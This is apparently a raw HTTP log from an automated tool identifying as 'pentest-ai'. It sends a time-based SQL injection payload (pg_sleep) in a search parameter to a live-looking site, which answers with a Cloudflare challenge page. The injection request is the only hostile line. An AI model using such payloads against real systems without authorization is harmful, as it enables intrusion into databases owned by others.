REQUEST:
GET https://my.myfirst.tech/search?name=1%27%20AND%20pg_sleep%285%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9323
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84747092fa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=g%2BdDUFGyRz1FBwS%2BITlVGRJ5xn6vseN3C4yLqKOHub8zzMm77upLppBXedRWxCehOZKbOPujN%2BkMOpArhjavKCMoD3OnMeumqRb9Yjcc%2BqAeteUnbPunxj30MuHFDG4wmzV9WFtNSBA%2FCyiNVA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84747092fa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '2bdXK4aBnNzTsf2pqjOV_9NBntV6IU1c6Xfcyp_hutc-1784281155-1.2.1.1-ssg0KvNf.uSO8PcgPfYWWSHqv8yosTQfXU5JrIoeFI_3LLSvFj6KreHMhUm__R3T',cITimeS: '1784281155',cRay: 'a1c84747092fa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?name=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_tk=PA54j8MXFOI2bz0PkPPN9w403hmWBxqVwLel5Xxqe9w-1784281155-1.0.1.1-4TRkTgH643S.ABgtxl1KAdsxsAMEHzJXXr4uDcmQxZw",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?name=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_f_tk=PA54j8MXFOI2bz0PkPPN9w403hmWBxqVwLel5Xxqe9w-1784281155-1.0.1.1-4TRkTgH643S.ABgtxl1KAdsxsAMEHzJXXr4uDcmQxZw",md: 'Y_O30XPCLjA6okHQtr2xQfQUpOttZUpBtma0PSkq8r4-1784281155-1.2.1.1-ivvfveL8R1sSM81Xx8EG.NgB77Gr7kmUk8VRdK3vDSPKZG8mYD1z9DqwPmLmA3ppPHY.wY.K_z8FAp3KSeaYKQrPnL_.MY1fsJuMXJ8N.bqrQT4aOdb4H0cJmxAtufxVcxW6iw1H_Bo8oYMk6dbZ22RkCnuNrtYRuve0U9pC5JWKI9eHUH4I7fp4Uv42ELKTlIZjcMOl31K3Ymyv0vp7yEAilnVtw90_W240gzKGru6xFLKRER9O5O_DudCUtw_YdNcyR0Q_nYjLUVcvEXYoNmor6Sc6WLuLFTf02ayO7.AiOF3d5cVPxYpqkiH2Lut6IiBHm.MdT9udxXwopkzdsyLecJnM5jzZAw1LwE.66vZKzLZWyzut87HRe9n20siQBenGsTVRKCz75IH2lkS0pvm.v7uskxk9YgF.P7aGg9dSNiCrPLIYdDI2WRzOtDsEuxbN9w5rujZ4bV0uz2gZYeltKsyyn6prL7wQDwxUGNiOIfsbHNlaB1o9L8mlMPbfpHAXEOY6OTiMX.0GlcZMMR8z80.H1FqCP74zeW2uZHEA7p9zcTXZB.mLhDQUdJ0CWFB6T20DINzQOeJhUgnwXuS8K1yqym7ajCKtMPT2XQTm4OkLjSay0iukEhpE5S4E4BZ.TjIWSgmNSaAz3kNi6nZ94M8iiSKtpad.vRzQbWi2qnCBmwe1v71H.YvJVcVzBUB__gKFsBF4n5gor4EHeTCPuqeXu3GD2OtW_yrHS9UlFKThvS0MFZ4RJpbfkNfgkrj49Rw5btUe4zDzxk6drNZ0FHOvx9XPekOaj_2IDH1oA947Q_bkfIiOHaSt6eNgBp3fWBVdBzXkkltQToY_x5H47JNlSrUKNxZmW7SvhIQ.mp2L9tZpv8UpNrO8q43wT50szqdKVv4AWw1w8de9sLBJt6Gm5HxGKR1zhqBYWPgI9g2YIxwiZ8ZLIToIIsAPphAaEovvaW9XSEzdrWIRNRghhJ5FYGsPnUbdC7CNPg9jOEVaJKD6yTr_kVnb2PZNY.2tB2mnv9piSNpbn8q1kIdA99syUaefgECTZl.yeVBOznsKxQgcChR7i__6Ssg1U7jwwMNxzes2vy9veM4kuv3JsOvj8pkFjvZM9cVkdvM9HnzRdGYbAwYnNURir45qRnti66BIYFZBocnBJvhH89thdzp0aONsbIZr6BxYd1c',mdrd: '4niZxcsBWW37wy.v9tOvCSc2MmIzu2qXlKtfIyUzNMQ-1784281155-1.2.1.1-6Xtlkh_XF4GvQIvMFu2zSaEeiLYdOTFE5HcoscA.Rk77CJczHt4Ncngrzu5XOI.RladyEX2nrvLSorWTKzNINcU2dw3TqY6CoG6N8Tm_uVrIEQekWAx52a1FNcv4r2QPdyCDFi_sJs65PFMFDQMzuims0RWPhpJRnLNc.MZeswcKWHJksYMelf9ry_F38VAwt6O5VsxWYR.aqooGAy7rNhdZ5x.TWlfhCQut1MOjIRGiSwUb7DxpnMCsXpkX28XW',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84747092fa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?name=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_rt_tk=PA54j8MXFOI2bz0PkPPN9w403hmWBxqVwLel5Xxqe9w-1784281155-1.0.1.1-4TRkTgH643S.ABgtxl1KAdsxsAMEHzJXXr4uDcmQxZw"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
